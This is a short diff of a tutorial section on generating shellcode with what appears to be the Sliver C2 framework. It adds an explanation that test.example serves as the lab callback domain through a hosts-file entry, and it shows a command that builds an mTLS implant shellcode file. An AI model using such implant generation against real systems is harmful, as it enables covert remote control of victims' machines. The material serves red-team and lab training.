Better Payload Generation

 Generate shellcode

 In a sliver shell we need to run the following to generate some shellcode to be used later.
-We’ll use test.example
+We’ll use test.example as the callback domain, we will add an entry to the Windows hosts file.

 generate --mtls test.example -f shellcode --save implants/shellcodex64.bin